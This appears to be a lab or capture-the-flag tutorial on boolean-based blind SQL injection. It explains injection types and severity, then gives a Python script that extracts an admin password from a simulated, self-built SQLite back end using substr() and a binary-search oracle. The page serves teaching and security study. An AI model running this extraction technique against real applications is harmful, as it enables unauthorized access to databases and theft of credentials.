Booleans And Blind!
Time: 2 Hours
Level: Hard

What is SQL Injection?

SQL injection (SQLi) allows an attacker to view data that they are normally not able to retrieve, such as information about other users and their passwords. An attacker can also modify or delete this data, causing persistent changes to the application's content or behaviour. In some cases an attacker can escalate an SQL injection attack to compromise the underlying server or other back-end infrastructure, or use it to perform a denial-of-service attack.

How does SQL Injection Work?

To carry out an SQL injection attack, the attacker first has to find a user input (a form field, URL parameter, cookie or header) that the web application splices directly into an SQL query. The attacker then crafts input, usually called a malicious payload, that changes the structure of the query rather than just the data it carries. When the application sends the resulting query to the database, the attacker's SQL is executed with whatever privileges the application's database account has.

Types of SQL Injection

  • In-band SQLi (Classic SQLi) : In-band SQL Injection occurs when an attacker is able to use the same communication channel to both launch the attack and gather results.
    • Error-based SQLi : Error-based SQLi is an in-band SQL Injection technique that relies on error messages thrown by the database server to obtain information about the structure of the database.
    • Union-based SQLi : Union-based SQLi is an in-band SQL injection technique that leverages the UNION SQL operator to combine the results of two or more SELECT statements into a single result which is then returned as part of the HTTP response.
  • Inferential SQLi (Blind SQLi) : In an inferential SQLi attack, the results of the injected query are never returned in the application's response. The attacker instead sends payloads and infers the result from how the application behaves.
    • Boolean-based (content-based) Blind SQLi : Boolean-based SQL Injection is an inferential SQL Injection technique that sends a query forcing the application to return a different response (for example, "product found" versus "not found") depending on whether the injected condition evaluates to TRUE or FALSE.
    • Time-based Blind SQLi : Time-based SQL Injection is an inferential SQL Injection technique that sends a query forcing the database to wait for a specified number of seconds before responding, so the response time reveals whether the injected condition was TRUE or FALSE.
  • Out-of-band SQLi : Out-of-band SQL Injection occurs when an attacker is unable to use the same channel to launch the attack and gather results, and instead relies on the database server making an outbound request (for example a DNS or HTTP request) to a host the attacker controls.
  • Voice-based SQL Injection : An SQL injection method applicable to applications that accept voice commands and turn them into database queries. An attacker can pull information from the database by speaking input that is transcribed into an SQL payload.

Severity

SQL injection is usually triaged as a P1 or P2 bug, with a CVSS base score of roughly 7.5 to 9.0. On the CVSS v3 scale, 7.0 to 8.9 is High and 9.0 and above is Critical, so the exact rating depends on what the injection lets the attacker read, change or reach.

Exploiting SQL Injection

1. Find an entry point on the web page for SQL injection, such as a parameter that is used in a database query. Check for SQL errors in the response when you submit a single quote or other syntax-breaking input.

2. Build an SQL payload by referring to the documentation for the back-end database. For bonus points, use a payload that calls database() together with functions such as ascii() and substr(), so that you can extract the database name one character at a time.

3. Check whether the payload was executed. With a blind injection point the result is not shown directly, so compare the response (its content or its timing) for a condition you know is true against one you know is false.
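The three steps above, and the boolean-based blind technique described in the types list, as one added worked example (code written for this page, not the lab's own application). It simulates a product page whose `id` parameter is concatenated into a query and which only reveals whether a row matched or whether the database errored. Step 1 probes with a single quote, step 2 extracts a string one character at a time with substr() and a character-code function, and step 3 is the oracle that checks whether each injected condition changed the response. The product and user data, the `Blind!42` password and all function names are constructed for this example; because the back end is SQLite, it uses unicode() where MySQL would use ascii(), and extracts a column where the lab's payload would use database().

```python
import sqlite3


def make_app_db():
    """Constructed in-memory back end for this example (not the lab's data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER, name TEXT)")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO products VALUES (1, 'Widget'), (2, 'Gadget')")
    conn.execute("INSERT INTO users VALUES ('admin', 'Blind!42')")
    conn.commit()
    return conn


def product_page(conn, product_id):
    """Simulated endpoint. The id parameter is concatenated into the query
    (the injection point). The body never shows query results, only whether
    a row matched or whether the database raised an error."""
    query = f"SELECT name FROM products WHERE id = {product_id}"
    try:
        row = conn.execute(query).fetchone()
    except sqlite3.Error:
        return "Database error"
    return "Product found" if row else "No such product"


def is_injectable(conn):
    """Step 1: a valid id works, an unbalanced quote turns into a DB error."""
    return (product_page(conn, "1") == "Product found"
            and product_page(conn, "1'") == "Database error")


def oracle(conn, condition):
    """Step 3: True when the injected condition left the page saying the
    product exists, i.e. the database evaluated the condition as TRUE."""
    return product_page(conn, f"1 AND ({condition})") == "Product found"


def _search(conn, expr, lo, hi):
    """Binary-search the integer value of SQL expression expr within [lo, hi]
    using only the oracle's true/false answers (about log2(hi-lo) requests)."""
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(conn, f"({expr}) > {mid}"):
            lo = mid + 1
        else:
            hi = mid
    return lo


def blind_extract(conn, column="password", where="username = 'admin'"):
    """Step 2: recover a string one character at a time with substr() and
    unicode() (SQLite's equivalent of MySQL's ascii()). Against MySQL the
    same loop runs over database() instead of a column."""
    def subq(expr):
        return f"SELECT {expr} FROM users WHERE {where}"

    length = _search(conn, subq(f"length({column})"), 0, 64)
    chars = []
    for pos in range(1, length + 1):
        code = _search(conn, subq(f"unicode(substr({column}, {pos}, 1))"), 32, 126)
        chars.append(chr(code))
    return "".join(chars)


if __name__ == "__main__":
    db = make_app_db()
    print("injectable:", is_injectable(db))
    print("admin password:", blind_extract(db))
```

Each oracle call asks one yes/no question, so the binary search keeps the request count low: about seven requests per character instead of up to 95 if you tried every printable value in turn. For a time-based variant you would keep the same search loop and replace the oracle with one that measures response time after injecting a delay function such as MySQL's SLEEP().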